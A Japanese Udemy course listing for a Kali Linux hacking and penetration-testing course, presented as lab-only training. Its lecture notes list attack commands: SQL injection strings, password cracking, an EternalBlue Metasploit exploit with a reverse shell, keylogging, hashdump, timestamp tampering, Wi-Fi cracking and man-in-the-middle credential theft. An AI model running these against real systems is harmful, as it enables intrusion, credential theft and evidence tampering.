【サイバーセキュリティ ハンズオン】ハッキング技術入門(不正侵入編)
3.9 (310 ratings)
Course Ratings are calculated from individual students’ ratings and a variety of other signals, like age of rating and reliability, to ensure that they reflect course quality fairly and accurately.
3,985 students enrolled

【サイバーセキュリティ ハンズオン】ハッキング技術入門(不正侵入編)

サイバー犯罪対策として攻撃者の手法を理解し実践することが重要です。本コースでは「Kali Linux」を用いたハンズオン形式で、パソコンやネットワークに対する攻撃手法とその対策を学習します。
3.9 (310 ratings)
Course Ratings are calculated from individual students’ ratings and a variety of other signals, like age of rating and reliability, to ensure that they reflect course quality fairly and accurately.
3,985 students enrolled
Last updated 8/2019
Japanese
Price: $199.99
30-Day Money-Back Guarantee
This course includes
  • 8.5 hours on-demand video
  • Full lifetime access
  • Access on mobile and TV
  • Certificate of Completion
Training 5 or more people?

Get your team access to 4,000+ top Udemy courses anytime, anywhere.

Try Udemy for Business
What you'll learn
  • パソコンへの不正侵入/脆弱性検査に関わるツールが操作できる
Requirements
  • Windows,Linuxのコマンド入力が可能な方
  • インターネット,パソコンの基礎知識が必要
Description

サイバー犯罪対策として攻撃者の手法を理解し実践することが重要です。

本コースでは「Kali Linux」を用いたハンズオン形式で、パソコンやネットワークに対する攻撃手法とその対策を学習します。

受講条件

  • コンピュータやインターネットの基礎知識を有すること

  • Windows及びLinuxのコマンドラインインタフェース(CUI)で操作可能であることが望ましい。

  • コンピュータ操作やツールマニュアルの理解に必要な英語力(高校英語程度)があると、本コースの理解度がより高まります。

  • 演習環境を自前で構築し、自らツールを操作することで内容の理解度が高まります。なお、環境構築が難しい場合、ビデオ閲覧のみでも理解できるような内容となっています。

演習環境の条件

  • Windows(Windows7推奨)、KaliLinux(RollingEdition推奨)各一台を所有するLAN環境が必要です

  • LANはインターネット接続がされていること

  • メディアは有線・無線のどちらでもOK。ただし、無線LANのクラッキングには無線インタフェースを持つマシンが必要です。

講座受講に関するお願い事項

 ※ レクチャー2で詳しく説明しています。必ず確認してください。※

  • 演習は受講者自身が管理している環境内で実施してください。

  • ハッキング技術を許可なく外部に実施したり、犯罪目的で使用しないでください。犯罪目的で使用した場合、各法令に基づき処罰されることがあります。

  • 本コースにより受講者のパソコンやインターネットの利用に不具合が生じても責任を負いかねますので予めご了承ください。

  • 可能な限り、演習環境は日頃使用しているパソコンとは別のものを利用してください。

  • 演習に使用するパソコンに重要な情報がないか、事前に確認してください。

  • 不具合が生じた場合に備え、バックアップを取るなど回復手段を準備してください。


Who this course is for:
  • 企業などのセキュリティ担当者,ハッキング技術を学びたい方
  • セキュリティ関係の仕事に突きたいので、実践的スキルを習得したいという方
  • セキュリティテスト(ペネトレーションテスト)を実施したいが、具体的な進め方がわからないという方
  • CSIRT(Computer Security Incident Response Team)のメンバになったので、必要なスキルを理解したいという方
Course content
Expand all 46 lectures 08:44:15
+ 演習環境について
1 lecture 08:35

https://qiita.com/306_san/items/391f2665d9bd5c5e9128

apt-get update

ipconfig /all

ping <Windows7のIPアドレス>

ping <KaliLinuxのIPアドレス>

Preview 08:35
+ 情報収集
9 lectures 01:16:59

whois

whois -h whois.jp <対象ドメインURL>

whois -h whois.jp <ハンドル名>

Whoisによるドメイン情報収集
06:14

http://www.googleguide.com/advanced_operators_reference.html

intitle:’index of’ site:jp パスワード

intitle:confidential, filetype:xlsx

Googleハッキング
09:12

https://www.shodan.io/

https://www.ipa.go.jp/files/000036921.pdf

Japan Anonymous FTP

printer password is not set

https://censys.io/

https://www.censys.io/ipv4/help

80.http.get.title:Network Camera AND Japan

ShodanおよびCensysによるインターネット接続機器調査
06:44

https://www.netcraft.com/

benesse.co.jp

www.benesse.co.jp

NetcraftによるWebサーバ情報収集
04:44

https://www.paterva.com/web7/downloads.php

https://docs.paterva.com/en/user-guide/

Maltegoによるネットワーク情報収集
09:45

https://www.spokeo.com/

https://www.zabasearch.com/

https://www.intelius.com/

個人情報検索サイトにおける情報収集
08:54

http://chizutwi.jp/twitter/

http://www.demap.info/

位置情報をベースにしたSNS情報収集
12:45

dig -h

dig <URL>

dig <URL> +noall +answer

dig -x <IPアドレス>

dig TYP <URL>

dig ANY <URL>

dig @<DNSサーバのIPアドレス> <URL>

dig @<DNSサーバのIPアドレス> chaos version.bind txt

digコマンドによる名前解決関連情報収集
12:39
+ 偵察
6 lectures 51:29

http://www.systemtools.com/somarsoft/index.html

DumpSecによるWindowsPCの情報収集
09:12

nbtscan

nbtscan <対象ネットワークのIPアドレス範囲>

NBTscanによるWindowsPCの名前情報のスキャン
03:15

http://www.advanced-ip-scanner.com/jp/

apt-get install apache2

service apache2 start

service ssh start

systemctl restart ssh

useradd <ユーザ名>

passwd<ユーザ名>

netstat -ant

ssh <ユーザ名@対象PCのIPアドレス>

Advanced IP ScannerによるPC情報収集
09:54

1頁のURLでの配布が停止されました.以下などからダウンロードしてください.

https://www.softpedia.com/get/Network-Tools/Network-IP-Scanner/SuperScan.shtml

Superscanによるポートスキャン
09:23

https://nmap.org/man/jp/

nmap

nmap -O -p <ポート番号> <攻撃対象PCのIPアドレス>

nmap -sV -sT -p <ポート番号> <攻撃対象PCのIPアドレス>

nmap -sA -p <ポート番号> <攻撃対象PCのIPアドレス>

http://knowledge.sakura.ad.jp/tech/97/4/

Nmapによるポートスキャン
15:46
+ 脆弱性検出
6 lectures 01:13:03

Hacme Casinoはマルウェアとして認定されたようです(下記サイト参考).スライド中のURLからの提供は停止されました.

Hacme  Casinoの代替を検討中です.

https://www.hybrid-analysis.com/sample/c22abec2e3fcf543753380cf17b136d61465c417cd24ec925f2946ea6a9bae92?environmentId=100

やられWebアプリケーションHacme Casinoのインストール
03:34

攻撃対象としているHacme Casinoはマルウェアとして認定されたようです

Hacme  Casinoの代替を検討中です.


https://www.owasp.org/index.php/OWASP_WebScarab_NG_Project

https://www.owasp.org/index.php/WebScarab_Getting_Started

a

b

‘) OR 1=1 --

c

d

http://<Windows7のIPアドレス>:3000

WebScarabによるWebアプリケーション脆弱性検出
23:40

Hacme Casinoはマルウェアとして認定されたようです(下記サイト参考).スライド中のURLからの提供は停止されました.

Hacme  Casinoの代替を検討中です.

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

http:// <対象WebサイトのIPアドレス:ポート番号>

OWASPzapによるWebサイト脆弱性スキャン
21:50

https://www.ceos3c.com/2017/06/27/install-openvas-kali-linux/

apt-get install openvas

openvas-setup

openvas-start

netstat -ant

openvasmd --create-user=<ユーザ名>

firefox https://127.0.0.1:9392

openvas-stop

OpenVASによるホスト端末脆弱性スキャン
14:49

nmap -sU -p 161 --script snmp-brute <攻撃対象IPアドレス>

nmap -p 445 --script smb-vuln-ms17-010 <攻撃対象IPアドレス>

Nmapスクリプトエンジンによる脆弱性検出
07:13
+ パスワード解読
6 lectures 51:35
Cain & AbelによるWindowsログインパスワードの解読
07:31

http://www.openwall.com/john/

useradd <アカウント名>

passwd <アカウント名>

unshadow /etc/passwd /etc/shadow > <結合ファイル名>

chmod 400 <結合ファイル名>

john --users=<アカウント名> <結合ファイル名>

userdel <アカウント名>



John The RipperによるKaliLinuxログインパスワードの解読
05:19

http://freecode.com/projects/fcrackzip

echo 1 > <出力ファイル名.txt>

zip -h

zip -e <ZIP圧縮後ファイル名.zip> < ZIP圧縮前ファイル名.txt >

fcrackzip -h

fcrackzip –u –v –l 3-10 <対象ZIPファイル>

FcrackzipによるZIPファイルのパスワード解読
05:38

https://www.apachefriends.org/jp/index.html

https://nendeb.com/146

https://ja.osdn.net/projects/ffftp/

http://hokori.net/archives/144

https://www.mozilla.org/ja/thunderbird/

apt-get install evolution

XAMMPを利用した攻撃用アプリケーション・サーバのインストール
18:24

http://tech-files.com/download-medusa-password-cracker-free/

http://download.openwall.net/pub/wordlists/

・・・ブラウザによっては上記サイトは安全でないと判定されます.

medusa

service ssh start

netstat -ant

useradd <アカウント名>

passwd <アカウント名>

medusa -f -h <攻撃対象PCのIPアドレス> -u <アカウント名> -P <辞書> -M ssh

medusa -f -h <攻撃対象PCのIPアドレス> -u <アカウント名> -p <パスワード> -M ftp

medusa -f -h <攻撃対象PCのIPアドレス> -u <アカウント名> -P <辞書> -M ftp

Medusaによるアプリケーションログインパスワードの解読
12:46
+ 侵入・遠隔操作
3 lectures 58:59

netstat -a

sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi

sc.exe config mrxsmb20 start= disabled

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

search ms17-010

search eternalblue

use exploit/windows/smb/eternalblue_doublepulsar

set payload windows/meterpreter/reverse_tcp

set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

show targets

set target <Id>

show options

set WINEPATH /root/

set TARGETARCHITECTURE x86

set PROCESSINJECT explorer.exe

set RHOST <攻撃対象のIPアドレス>

set LHOST <攻撃PCのIPアドレス>

show options

exploit

shell

脆弱性を利用した侵入
30:40

sysinfo

getuid

getsystem

shell

whoami

background

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set LHOST <攻撃PCのIPアドレス>

set session <既成のセッションの番号>

show options

run

screenshot

ps

migrate <PID>

run post/windows/capture/keylog_recorder

cat /root/.msf4/・・・・

timestomp

timestomp –v <ファイル名>

timestomp –c “mm/dd/year hour:minite:second” <ファイル名>

run checkvm

run post/windows/gather/checkvm

hashdump

download <ファイル名>










不正な遠隔操作
27:22
+ 無線LANクラッキング
4 lectures 01:09:24

apt-get update

apt-get install gpsd

apt-get install android-tools-adb

lsmod | grep bluetooth

systemctl enable bluetooth.service

systemctl start bluetooth.service

adb -h

adb devices

adb forward tcp:4352 tcp:4352

gpsd -h

gpsd -N -n -D5 tcp://localhost:4352

kismet -h

ifconfig

leafpad /etc/kismet/kismet.conf

kismet

giskismet -h

giskismet -x Kismet-<日付>.netxml

giskismet -q "SELECT * FROM WIRELESS" -o out.kml

KismetとGISKismetによる無線LAN情報の取集と地図表示
28:17

iwconfig

airmon-ng start wlan0

airodump-ng --help

airodump-ng <インタフェース 例.wlan0mon>

airodump-ng --channel <チャネル> --bssid <チャネル> -w <出力ファイル名例.out0> <インタフェース例.wlan0mon >

aircrack-ng --help

aircrack-ng <ファイル名>




Aircrack-ngによるWEPパスワード解読
14:41

iwconfig

airmon-ng start wlan0

airodump-ng <インタフェース 例.wlan0mon>

airodump-ng -c <チャネル> --bssid <bssid名>  -w <出力ファイル名例.cpt0> <インタフェース例.wlan0mon >

cowpatty -h

cowpatty -r <収集したパケットファイル名 例.cpt0-01.cap > -f <辞書名.例.lower+.lst> -s ‘SSID’

genpmk -h

genpmk -f <辞書名.例.lower+.lst> -d <レインボーテーブル名  例.rainbow0.tbl > -s ‘SSID’

cowpatty -r <収集したパケットファイル名 例.cpt0-01.cap > -d <レインボーテーブル名 例.rainbow0.tbl > -s ‘SSID’

coWPAttyによるWPA/WPA2-PSKパスワード解読
25:20
+ なりすまし
4 lectures 57:46

https://www.vpnbook.com/

http://whatismyipaddress.com/

ifconfig

netstat -ant

ping <対象サイトのIPアドレス>

unzip <VPNbookクライアントソフト名>

openvpn <ファイル名.例.vpnbook-euro1-tcp80.ovpn>

VPNbookによるIPアドレスの変更
16:28

http://ettercap.sourceforge.net/downloads.html

ipconfig /all

arp -a

ifconfig

EttercapによるARPスプーフィングと中間者攻撃
14:18

https://wifiphisher.org/download.html

https://github.com/wifiphisher/wifiphisher

https://media.readthedocs.org/pdf/wifiphisher/latest/wifiphisher.pdf

apt-get install wifiphisher

git clone https://github.com/wifiphisher/wifiphisher

cd wifiphisher

python setup.py install

wifiphisher -h

ifconfig -a

iwconfig

ipconfig /all

wifiphisher

netstat -ant

Wifiphisherによるアクセスポイントのなりすまし
25:54
+ 盗聴・改ざん
5 lectures 01:06:59

https://www.wireshark.org/

ipconfig

Wiresharkによるパケットの盗聴
12:20

https://github.com/byt3bl33d3r/MITMf

apt-get install mitmf

mitmf -h

ifconfig -a

arp -a

ipconfig /all

mitmf -i <インタフェース> --spoof --arp --hsts --gateway

<デフォルトゲートウエイのIPアドレス> -- target <攻撃対象マシンの

IPアドレス>

https://accounts.google.com/ServiceLogin

MITMfによるWebブラウザ入力情報の窃取
16:36

’) OR 1=1 --

登録ユーザID’)--

ipconfig

bobby_blackjack’) --

SQLインジェクションを用いたデータベースの改ざん
13:29

https://portswigger.net/burp

http://tech.pjin.jp/blog/2016/07/08/burp-suite-1-7の使い方%E3%80%80その1/

https://playingcards.jp/game_rules/blackjack_rules.html

ipconfig

<Windows7のIPアドレス>:3000

bobby_blackjack’) --

<Windows7のIPアドレス>:3000/blackjack/hit_or_stay?act=S

プロキシツールを利用したオンラインゲームのチート
22:45